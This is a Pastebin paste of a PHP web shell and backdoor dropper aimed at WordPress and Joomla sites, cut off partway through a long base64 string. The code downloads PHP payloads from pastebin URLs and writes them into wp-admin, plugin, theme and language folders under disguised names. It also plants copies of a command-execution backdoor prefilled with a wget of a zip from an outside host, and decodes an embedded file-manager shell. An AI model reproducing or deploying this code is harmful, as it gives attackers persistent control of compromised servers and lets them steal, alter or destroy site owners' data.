Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // <================================================>
- $wordpress = 0; // wordpress Activité
- // <================================================>
- $wp_2 = 0; // multipart Activité
- // <================================================>
- $multipartdexter = 1; // multipart Activité
- // <================================================>
- $sexhub = 0; // Joomla & wordpress working in public_html/......
- // <================================================>
- set_time_limit(0);
- error_reporting(0);
- echo "
- <style>
- .myButton {
- -moz-box-shadow:inset -1px 0px 50px 0px #fff6af;
- -webkit-box-shadow:inset -1px 0px 50px 0px #fff6af;
- background:-moz-linear-gradient(top, #ffec64 5%, #ffab23 100%);
- background:linear-gradient(to bottom, #ffec64 5%, #ffab23 100%);
- filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffec64', endColorstr='#ffab23',GradientType=0);
- background-color:#ffec64;
- -moz-border-radius:7px;
- -webkit-border-radius:7px;
- border-radius:7px;
- border:1px solid #ffaa22;
- display:inline-block;
- cursor:pointer;
- color:#333333;
- font-family:Arial;
- font-size:13px;
- padding:4px 5px;
- text-decoration:none;
- text-shadow:10px 0px 41px #ffee66;
- }
- </style>
- ";
- $script = basename($_SERVER['SCRIPT_NAME']);
- $azzouz = $_SERVER['HTTP_HOST'];
- $azerty = $_SERVER['SERVER_NAME'];
- $abcd = dirname($_SERVER['PHP_SELF']) ;
- $url = "$azerty/$abcd";
- echo "<link href='http://www.iconj.com/ico/g/0/g0f05tlicq.ico' rel='shortcut icon' type='image/x-icon'>
- <title>Manager</title><br>
- <form method='POST'>
- <a href='$script?ls' class='myButton'>ScanDir</a>
- <a href='$script?random' class='myButton'>Random</a>
- <a href='$script?kill' class='myButton' style='color: blue;'>Remove</a>
- <a href='$script?dexter' class='myButton'>Execute</a>
- <a href='$script?presta' class='myButton'>PreSheap</a>
- <a href='$script?wordpress' class='myButton'>wordpress</a>
- <a href='$script?upload' class='myButton'>Upload</a>
- <a href='$script?lite' class='myButton'>Shell</a>
- <a href='$script?reset' class='myButton'>Reset</a>
- </form>";
- ///////////////////////////////////////
- if($sexhub !== 1 ){}else{
- $fgh = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
- $xcbv = "./modules/posts.php";
- $wxcv=fopen($xcbv,'w');
- fwrite($wxcv,$fgh);
- $rtyu = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
- $jklm = "./modules/value.php";
- $sdf=fopen($jklm,'w');
- fwrite($sdf,$rtyu);
- $ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
- $uio = "./modules/links.php";
- $cvb=fopen($uio,'w');
- fwrite($cvb,$ghjk);
- $fgh = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
- $xcbv = "./wp-admin/posts.php";
- $wxcv=fopen($xcbv,'w');
- fwrite($wxcv,$fgh);
- $rtyu = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
- $jklm = "./wp-admin/value.php";
- $sdf=fopen($jklm,'w');
- fwrite($sdf,$rtyu);
- $ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
- $uio = "./wp-admin/links.php";
- $cvb=fopen($uio,'w');
- fwrite($cvb,$ghjk);
- echo "<br><br>";
- echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#0a5d00"." href="."http://$azzouz/modules/links.php"." target="."_blank".">www.$azzouz/modules/wp-links.php"."</a><br>";
- echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/modules/value.php?pass=ransomware"." target="."_blank".">www.$azzouz/modules/wp-value.php"."</a><br>";
- echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/modules/posts.php"." target="."_blank".">www.$azzouz/modules/wp-posts.php"."</a>";
- echo "<br><br>";
- echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#0a5d00"." href="."http://$azzouz/wp-admin/links.php"." target="."_blank".">www.$azzouz/wp-admin/wp-links.php"."</a><br>";
- echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-admin/value.php?pass=ransomware"." target="."_blank".">www.$azzouz/wp-admin/wp-value.php"."</a><br>";
- echo "<font style="."color:#9c0000".">[-] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-admin/posts.php"." target="."_blank".">www.$azzouz/wp-admin/wp-posts.php"."</a>";
- echo "<br>";
- }
- ///////////////////////////////////////
- if($wordpress !== 1 ){}else{
- $fgh = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
- $xcbv = "../../../../wp-posts.php";
- $wxcv=fopen($xcbv,'w');
- fwrite($wxcv,$fgh);
- $rtyu = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
- $jklm = "../../../../wp-value.php";
- $sdf=fopen($jklm,'w');
- fwrite($sdf,$rtyu);
- $ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
- $uio = "../../../../wp-links.php";
- $cvb=fopen($uio,'w');
- fwrite($cvb,$ghjk);
- }
- ///////////////////////////////////////
- if($wp_2 !== 1 ){}else{
- $fgh = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
- $xcbv = "../../../wp-posts.php";
- $wxcv=fopen($xcbv,'w');
- fwrite($wxcv,$fgh);
- $rtyu = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
- $jklm = "../../../wp-value.php";
- $sdf=fopen($jklm,'w');
- fwrite($sdf,$rtyu);
- $ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
- $uio = "../../../wp-links.php";
- $cvb=fopen($uio,'w');
- fwrite($cvb,$ghjk);
- }
- ///////////////////////////////////////
- $multipart = '
- <html>
- <br>
- <div style="text-align: left;">
- <form method="post" enctype="multipart/form-data">
- <input name="cmd" value="wget http://batut.com.ua/misc/farbtastic/ms-authorze.zip" size="50" type="text"/>
- <input value="Execute" id="Execute" type="submit"/>
- <br></div>
- </form>
- <form method="post" enctype="multipart/form-data">
- <input name="cmd" value="unzip ms-authorze.zip" size="50" type="text"/>
- <input value="Execute" id="Execute" type="submit"/>
- <br></div></form>
- <br>
- <br>
- <?php
- $azerty = $_SERVER["SERVER_NAME"];
- $abcd = dirname($_SERVER["PHP_SELF"]) ;
- $url = "$azerty/$abcd";
- echo "<br><br>";
- echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#0a5d00"." href="."http://$url/wp-authorze.php"." target="."_blank".">www.$url/wp-authorze.php"."</a><br>";
- echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$url/wp-views.php?pass=ransomware"." target="."_blank".">www.$url/wp-views.php"."</a><br>";
- echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$url/wp-output.php"." target="."_blank".">www.$url/wp-output.php"."</a>";
- echo "<br><br>";
- if (isset($_POST["cmd"])) {
- function exe($cmd) {
- if(function_exists("system")) {
- @ob_start();
- @system($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif(function_exists("exec")) {
- @exec($cmd,$results);
- $buff = "";
- foreach($results as $result) {
- $buff .= $result;
- } return $buff;
- } elseif(function_exists("passthru")) {
- @ob_start();
- @passthru($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif(function_exists("shell_exec")) {
- $buff = @shell_exec($cmd);
- return $buff;
- }
- }
- echo "<pre>".exe($_POST["cmd"])."</pre>";
- } //Dexter Haxor ./www.fb.com/dreamdeface.org
- ?>
- ';
- if($multipartdexter !== 1 ){}else{
- $auth=fopen("wp-multipart.php",'w');
- fwrite($auth,$multipart);
- $auth2=fopen("../../wp-multipart.php",'w');
- fwrite($auth2,$multipart);
- $auth2=fopen("../../../wp-multipart.php",'w');
- fwrite($auth2,$multipart);
- $auth3=fopen("../../../../wp-multipart.php",'w');
- fwrite($auth3,$multipart);
- }
- echo "<br>";
- echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."https://$azzouz/index.php"." target="."_blank".">www.$azzouz/index.php"."</a><br>";
- echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."http://$url/wp-multipart.php"." target="."_blank".">www.$url/wp-multipart.php"."</a><br>";
- echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."http://$azzouz/wp-multipart.php"." target="."_blank".">www.$azzouz/wp-multipart.php"."</a><br>";
- echo "<br>";
- echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-posts.php"." target="."_blank".">www.$azzouz/wp-posts.php"."</a><br>";
- echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-value.php?pass=ransomware"." target="."_blank".">www.$azzouz/wp-value.php"."</a><br>";
- echo "<font style="."color:#9c0000".">[+] </font><a style="."color:#5a3ab7"." href="."http://$azzouz/wp-links.php"." target="."_blank".">www.$azzouz/wp-links.php"."</a>";
- echo "<br><br>";
- if(isset($_GET["wordpress"])){
- $sss=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../');
- foreach($sss as $pa){
- $p1=array("$pa/wp-admin/user/");
- foreach($p1 as $path){
- if (file_exists("$path")){
- $print = $path."cron".rand(999, 123).".php";
- //-------------------------------------------
- $url = 'https://pastebin.com/raw/jWBjgLd2';
- $st = curl_init();
- curl_setopt($st,CURLOPT_URL,$url);
- curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
- $html = curl_exec($st);
- curl_close($st);
- //-------------------------------------------
- $save=fopen($print,'w');
- fwrite($save,$html);
- $print = "__$print";
- $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
- break;
- }
- $p2=array("$pa/wp-content/plugins/");
- foreach($p2 as $path){
- if (file_exists("$path")){
- $print = $path."cron".rand(999, 123).".php";
- //-------------------------------------------
- $url = 'https://pastebin.com/raw/jWBjgLd2';
- $st = curl_init();
- curl_setopt($st,CURLOPT_URL,$url);
- curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
- $html = curl_exec($st);
- curl_close($st);
- //-------------------------------------------
- $save=fopen($print,'w');
- fwrite($save,$html);
- $print = "__$print";
- $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
- }}
- }
- //////
- $p3=array("$pa/wp-admin/network/");
- foreach($p3 as $path){
- if (file_exists("$path")){
- $print = $path."system".rand(999, 123).".php";
- //-------------------------------------------
- $url = 'https://pastebin.com/raw/nxJA9qiA';
- $st = curl_init();
- curl_setopt($st,CURLOPT_URL,$url);
- curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
- $html = curl_exec($st);
- curl_close($st);
- //-------------------------------------------
- $save=fopen($print,'w');
- fwrite($save,$html);
- $print = "__$print";
- $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
- break;
- }
- $p4=array("$pa/wp-content/languages/");
- foreach($p4 as $path){
- if (file_exists("$path")){
- $print = $path."system".rand(999, 123).".php";
- //-------------------------------------------
- $url = 'https://pastebin.com/raw/nxJA9qiA';
- $st = curl_init();
- curl_setopt($st,CURLOPT_URL,$url);
- curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
- $html = curl_exec($st);
- curl_close($st);
- //-------------------------------------------
- $save=fopen($print,'w');
- fwrite($save,$html);
- $print = "__$print";
- $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
- }}
- }
- //////
- $p5=array("$pa/wp-content/themes/");
- foreach($p5 as $path){
- if (file_exists("$path")){
- $print = $path."view".rand(999, 123).".php";
- //-------------------------------------------
- $url = 'https://pastebin.com/raw/wL527WWg';
- $st = curl_init();
- curl_setopt($st,CURLOPT_URL,$url);
- curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
- $html = curl_exec($st);
- curl_close($st);
- //-------------------------------------------
- $save=fopen($print,'w');
- fwrite($save,$html);
- $print = "__$print";
- $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
- break;
- }
- $p6=array("$pa/wp-admin/");
- foreach($p6 as $path){
- if (file_exists("$path")){
- $print = $path."view".rand(999, 123).".php";
- //-------------------------------------------
- $url = 'https://pastebin.com/raw/wL527WWg';
- $st = curl_init();
- curl_setopt($st,CURLOPT_URL,$url);
- curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
- $html = curl_exec($st);
- curl_close($st);
- //-------------------------------------------
- $save=fopen($print,'w');
- fwrite($save,$html);
- $print = "__$print";
- $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
- echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
- }}
- }
- }
- }
- if(isset($_GET["lite"])){
- $al7wa = base64_decode('PD9waHAKc2V0X3RpbWVfbGltaXQoMCk7CmVycm9yX3JlcG9ydGluZygwKTsKCmlmKGdldF9tYWdpY19xdW90ZXNfZ3BjKCkpewogICAgZm9yZWFjaCgkX1BPU1QgYXMgJGtleT0+JHZhbHVlKXsKICAgICAgICAkX1BPU1RbJGtleV0gPSBzdHJpcHNsYXNoZXMoJHZhbHVlKTsKICAgIH0KfQplY2hvICc8IURPQ1RZUEUgSFRNTD4KPEhUTUw+CjxIRUFEPgo8bGluayBocmVmPSIiIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiPgo8bGluayBocmVmPSJodHRwOi8vd3d3Lmljb25qLmNvbS9pY28vZy8wL2cwZjA1dGxpY3EuaWNvIiByZWw9InNob3J0Y3V0IGljb24iIHR5cGU9ImltYWdlL3gtaWNvbiI+Cjx0aXRsZT5NYW5hZ2VyPC90aXRsZT4KPHN0eWxlPgpib2R5ewogICAgZm9udC1mYW1pbHk6ICJSYWNpbmcgU2FucyBPbmUiLCBjdXJzaXZlOwogICAgYmFja2dyb3VuZC1jb2xvcjogI2U2ZTZlNjsKICAgIHRleHQtc2hhZG93OjBweCAwcHggMXB4ICM3NTc1NzU7Cn0KI2NvbnRlbnQgdHI6aG92ZXJ7CiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjNjM2MjYzOwogICAgdGV4dC1zaGFkb3c6MHB4IDBweCAxMHB4ICNmZmY7Cn0KI2NvbnRlbnQgLmZpcnN0ewogICAgYmFja2dyb3VuZC1jb2xvcjogc2lsdmVyOwp9CiNjb250ZW50IC5maXJzdDpob3ZlcnsKICAgIGJhY2tncm91bmQtY29sb3I6IHNpbHZlcjsKICAgIHRleHQtc2hhZG93OjBweCAwcHggMXB4ICM3NTc1NzU7Cn0KdGFibGV7CiAgICBib3JkZXI6IDFweCAjMDAwMDAwIGRvdHRlZDsKfQpIMXsKICAgIGZvbnQtZmFtaWx5OiAiUnllIiwgY3Vyc2l2ZTsKfQphewogICAgY29sb3I6ICMwMDA7CiAgICB0ZXh0LWRlY29yYXRpb246IG5vbmU7Cn0KYTpob3ZlcnsKICAgIGNvbG9yOiAjZmZmOwogICAgdGV4dC1zaGFkb3c6MHB4IDBweCAxMHB4ICNmZmZmZmY7Cn0KaW5wdXQsc2VsZWN0LHRleHRhcmVhewogICAgYm9yZGVyOiAxcHggIzAwMDAwMCBzb2xpZDsKICAgIC1tb3otYm9yZGVyLXJhZGl1czogNXB4OwogICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOjVweDsKICAgIGJvcmRlci1yYWRpdXM6NXB4Owp9Cjwvc3R5bGU+CjwvSEVBRD4KPEJPRFk+CjxIMT48Y2VudGVyPjwvY2VudGVyPjwvSDE+Cjx0YWJsZSB3aWR0aD0iNzAwIiBib3JkZXI9IjAiIGNlbGxwYWRkaW5nPSIzIiBjZWxsc3BhY2luZz0iMSIgYWxpZ249ImNlbnRlciI+Cjx0cj48dGQ+Q3VycmVudCBQYXRoIDogJzsKaWYoaXNzZXQoJF9HRVRbJ3BhdGgnXSkpewogICAgJHBhdGggPSAkX0dFVFsncGF0aCddOyAgIAp9ZWxzZXsKICAgICRwYXRoID0gZ2V0Y3dkKCk7Cn0KJHBhdGggPSBzdHJfcmVwbGFjZSgnXFwnLCcvJywkcGF0aCk7CiRwYXRocyA9IGV4cGxvZGUoJy8nLCRwYXRoKTsKCmZvcmVhY2goJHBhdGhzIGFzICRpZD0+JHBhdCl7CiAgICBpZigkcGF0ID09ICcnICYmICRpZCA9PSAwKXsKICAgICAgICAkYSA9IHRydWU7CiAgICAgICAgZWNobyAnPGEgaHJlZj0iP3BhdGg9LyI+LzwvYT4nOwogICAgICAgIGNvbnRpbnVlOwogICAgfQogICAgaWYoJHBhdCA9PSAnJykgY29udGludWU7CiAgICBlY2hvICc8YSBocmVmPSI/cGF0aD0nOwogICAgZm9yKCRpPTA7JGk8PSRpZDskaSsrKXsKICAgICAgICBlY2hvICIkcGF0aHNbJGldIjsKICAgICAgICBpZigkaSAhPSAkaWQpIGVjaG8gIi8iOwogICAgfQogICAgZWNobyAnIj4nLiRwYXQuJzwvYT4vJzsKfQplY2hvICc8L3RkPjwvdHI+PHRyPjx0ZD4nOwppZihpc3NldCgkX0ZJTEVTWydmaWxlJ10pKXsKICAgIGlmKGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCRwYXRoLicvJy4kX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpewogICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+RmlsZSBVcGxvYWQgRG9uZS48L2ZvbnQ+PGJyIC8+JzsKICAgIH1lbHNlewogICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJyZWQiPkZpbGUgVXBsb2FkIEVycm9yLjwvZm9udD48YnIgLz4nOwogICAgfQp9CmVjaG8gJzxmb3JtIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCI+ClVwbG9hZCBGaWxlIDogPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIC8+CjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJ1cGxvYWQiIC8+CjwvZm9ybT4KPC90ZD48L3RyPic7CmlmKGlzc2V0KCRfR0VUWydmaWxlc3JjJ10pKXsKICAgIGVjaG8gIjx0cj48dGQ+Q3VycmVudCBGaWxlIDogIjsKICAgIGVjaG8gJF9HRVRbJ2ZpbGVzcmMnXTsKICAgIGVjaG8gJzwvdHI+PC90ZD48L3RhYmxlPjxiciAvPic7CiAgICBlY2hvKCc8cHJlPicuaHRtbHNwZWNpYWxjaGFycyhmaWxlX2dldF9jb250ZW50cygkX0dFVFsnZmlsZXNyYyddKSkuJzwvcHJlPicpOwp9ZWxzZWlmKGlzc2V0KCRfR0VUWydvcHRpb24nXSkgJiYgJF9QT1NUWydvcHQnXSAhPSAnZGVsZXRlJyl7CiAgICBlY2hvICc8L3RhYmxlPjxiciAvPjxjZW50ZXI+Jy4kX1BPU1RbJ3BhdGgnXS4nPGJyIC8+PGJyIC8+JzsKICAgIGlmKCRfUE9TVFsnb3B0J10gPT0gJ2NobW9kJyl7CiAgICAgICAgaWYoaXNzZXQoJF9QT1NUWydwZXJtJ10pKXsKICAgICAgICAgICAgaWYoY2htb2QoJF9QT1NUWydwYXRoJ10sJF9QT1NUWydwZXJtJ10pKXsKICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+Q2hhbmdlIFBlcm1pc3Npb24gRG9uZS48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj5DaGFuZ2UgUGVybWlzc2lvbiBFcnJvci48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICBlY2hvICc8Zm9ybSBtZXRob2Q9IlBPU1QiPgogICAgICAgIFBlcm1pc3Npb24gOiA8aW5wdXQgbmFtZT0icGVybSIgdHlwZT0idGV4dCIgc2l6ZT0iNCIgdmFsdWU9Iicuc3Vic3RyKHNwcmludGYoJyVvJywgZmlsZXBlcm1zKCRfUE9TVFsncGF0aCddKSksIC00KS4nIiAvPgogICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhdGgiIHZhbHVlPSInLiRfUE9TVFsncGF0aCddLiciPgogICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im9wdCIgdmFsdWU9ImNobW9kIj4KICAgICAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR28iIC8+CiAgICAgICAgPC9mb3JtPic7CiAgICB9ZWxzZWlmKCRfUE9TVFsnb3B0J10gPT0gJ3JlbmFtZScpewogICAgICAgIGlmKGlzc2V0KCRfUE9TVFsnbmV3bmFtZSddKSl7CiAgICAgICAgICAgIGlmKHJlbmFtZSgkX1BPU1RbJ3BhdGgnXSwkcGF0aC4nLycuJF9QT1NUWyduZXduYW1lJ10pKXsKICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+Q2hhbmdlIE5hbWUgRG9uZS48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj5DaGFuZ2UgTmFtZSBFcnJvci48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfQogICAgICAgICAgICAkX1BPU1RbJ25hbWUnXSA9ICRfUE9TVFsnbmV3bmFtZSddOwogICAgICAgIH0KICAgICAgICBlY2hvICc8Zm9ybSBtZXRob2Q9IlBPU1QiPgogICAgICAgIE5ldyBOYW1lIDogPGlucHV0IG5hbWU9Im5ld25hbWUiIHR5cGU9InRleHQiIHNpemU9IjIwIiB2YWx1ZT0iJy4kX1BPU1RbJ25hbWUnXS4nIiAvPgogICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhdGgiIHZhbHVlPSInLiRfUE9TVFsncGF0aCddLiciPgogICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im9wdCIgdmFsdWU9InJlbmFtZSI+CiAgICAgICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkdvIiAvPgogICAgICAgIDwvZm9ybT4nOwogICAgfWVsc2VpZigkX1BPU1RbJ29wdCddID09ICdlZGl0Jyl7CiAgICAgICAgaWYoaXNzZXQoJF9QT1NUWydzcmMnXSkpewogICAgICAgICAgICAkZnAgPSBmb3BlbigkX1BPU1RbJ3BhdGgnXSwndycpOwogICAgICAgICAgICBpZihmd3JpdGUoJGZwLCRfUE9TVFsnc3JjJ10pKXsKICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+RWRpdCBGaWxlIERvbmUuPC9mb250PjxiciAvPic7CiAgICAgICAgICAgIH1lbHNlewogICAgICAgICAgICAgICAgZWNobyAnPGZvbnQgY29sb3I9InJlZCI+RWRpdCBGaWxlIEVycm9yLjwvZm9udD48YnIgLz4nOwogICAgICAgICAgICB9CiAgICAgICAgICAgIGZjbG9zZSgkZnApOwogICAgICAgIH0KICAgICAgICBlY2hvICc8Zm9ybSBtZXRob2Q9IlBPU1QiPgogICAgICAgIDx0ZXh0YXJlYSBjb2xzPTgwIHJvd3M9MjAgbmFtZT0ic3JjIj4nLmh0bWxzcGVjaWFsY2hhcnMoZmlsZV9nZXRfY29udGVudHMoJF9QT1NUWydwYXRoJ10pKS4nPC90ZXh0YXJlYT48YnIgLz4KICAgICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJwYXRoIiB2YWx1ZT0iJy4kX1BPU1RbJ3BhdGgnXS4nIj4KICAgICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJvcHQiIHZhbHVlPSJlZGl0Ij4KICAgICAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR28iIC8+CiAgICAgICAgPC9mb3JtPic7CiAgICB9CiAgICBlY2hvICc8L2NlbnRlcj4nOwp9ZWxzZXsKICAgIGVjaG8gJzwvdGFibGU+PGJyIC8+PGNlbnRlcj4nOwogICAgaWYoaXNzZXQoJF9HRVRbJ29wdGlvbiddKSAmJiAkX1BPU1RbJ29wdCddID09ICdkZWxldGUnKXsKICAgICAgICBpZigkX1BPU1RbJ3R5cGUnXSA9PSAnZGlyJyl7CiAgICAgICAgICAgIGlmKHJtZGlyKCRfUE9TVFsncGF0aCddKSl7CiAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0iZ3JlZW4iPkRlbGV0ZSBEaXIgRG9uZS48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj5EZWxldGUgRGlyIEVycm9yLjwvZm9udD48YnIgLz4nOwogICAgICAgICAgICB9CiAgICAgICAgfWVsc2VpZigkX1BPU1RbJ3R5cGUnXSA9PSAnZmlsZScpewogICAgICAgICAgICBpZih1bmxpbmsoJF9QT1NUWydwYXRoJ10pKXsKICAgICAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSJncmVlbiI+RGVsZXRlIEZpbGUgRG9uZS48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj5EZWxldGUgRmlsZSBFcnJvci48L2ZvbnQ+PGJyIC8+JzsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIH0KICAgIGVjaG8gJzwvY2VudGVyPic7CiAgICAkc2NhbmRpciA9IHNjYW5kaXIoJHBhdGgpOwogICAgZWNobyAnPGRpdiBpZD0iY29udGVudCI+PHRhYmxlIHdpZHRoPSI3MDAiIGJvcmRlcj0iMCIgY2VsbHBhZGRpbmc9IjMiIGNlbGxzcGFjaW5nPSIxIiBhbGlnbj0iY2VudGVyIj4KICAgIDx0ciBjbGFzcz0iZmlyc3QiPgogICAgICAgIDx0ZD48Y2VudGVyPk5hbWU8L2NlbnRlcj48L3RkPgogICAgICAgIDx0ZD48Y2VudGVyPlNpemU8L2NlbnRlcj48L3RkPgogICAgICAgIDx0ZD48Y2VudGVyPlBlcm1pc3Npb25zPC9jZW50ZXI+PC90ZD4KICAgICAgICA8dGQ+PGNlbnRlcj5PcHRpb25zPC9jZW50ZXI+PC90ZD4KICAgIDwvdHI+JzsKCiAgICBmb3JlYWNoKCRzY2FuZGlyIGFzICRkaXIpewogICAgICAgIGlmKCFpc19kaXIoIiRwYXRoLyRkaXIiKSB8fCAkZGlyID09ICcuJyB8fCAkZGlyID09ICcuLicpIGNvbnRpbnVlOwogICAgICAgIGVjaG8gIjx0cj4KICAgICAgICA8dGQ+PGEgaHJlZj1cIj9wYXRoPSRwYXRoLyRkaXJcIj4kZGlyPC9hPjwvdGQ+CiAgICAgICAgPHRkPjxjZW50ZXI+LS08L2NlbnRlcj48L3RkPgogICAgICAgIDx0ZD48Y2VudGVyPiI7CiAgICAgICAgaWYoaXNfd3JpdGFibGUoIiRwYXRoLyRkaXIiKSkgZWNobyAnPGZvbnQgY29sb3I9ImdyZWVuIj4nOwogICAgICAgIGVsc2VpZighaXNfcmVhZGFibGUoIiRwYXRoLyRkaXIiKSkgZWNobyAnPGZvbnQgY29sb3I9InJlZCI+JzsKICAgICAgICBlY2hvIHBlcm1zKCIkcGF0aC8kZGlyIik7CiAgICAgICAgaWYoaXNfd3JpdGFibGUoIiRwYXRoLyRkaXIiKSB8fCAhaXNfcmVhZGFibGUoIiRwYXRoLyRkaXIiKSkgZWNobyAnPC9mb250Pic7CiAgICAgICAgCiAgICAgICAgZWNobyAiPC9jZW50ZXI+PC90ZD4KICAgICAgICA8dGQ+PGNlbnRlcj48Zm9ybSBtZXRob2Q9XCJQT1NUXCIgYWN0aW9uPVwiP29wdGlvbiZwYXRoPSRwYXRoXCI+CiAgICAgICAgPHNlbGVjdCBuYW1lPVwib3B0XCI+CgkgICAgPG9wdGlvbiB2YWx1ZT1cIlwiPjwvb3B0aW9uPgogICAgICAgIDxvcHRpb24gdmFsdWU9XCJkZWxldGVcIj5EZWxldGU8L29wdGlvbj4KICAgICAgICA8b3B0aW9uIHZhbHVlPVwiY2htb2RcIj5DaG1vZDwvb3B0aW9uPgogICAgICAgIDxvcHRpb24gdmFsdWU9XCJyZW5hbWVcIj5SZW5hbWU8L29wdGlvbj4KICAgICAgICA8L3NlbGVjdD4KICAgICAgICA8aW5wdXQgdH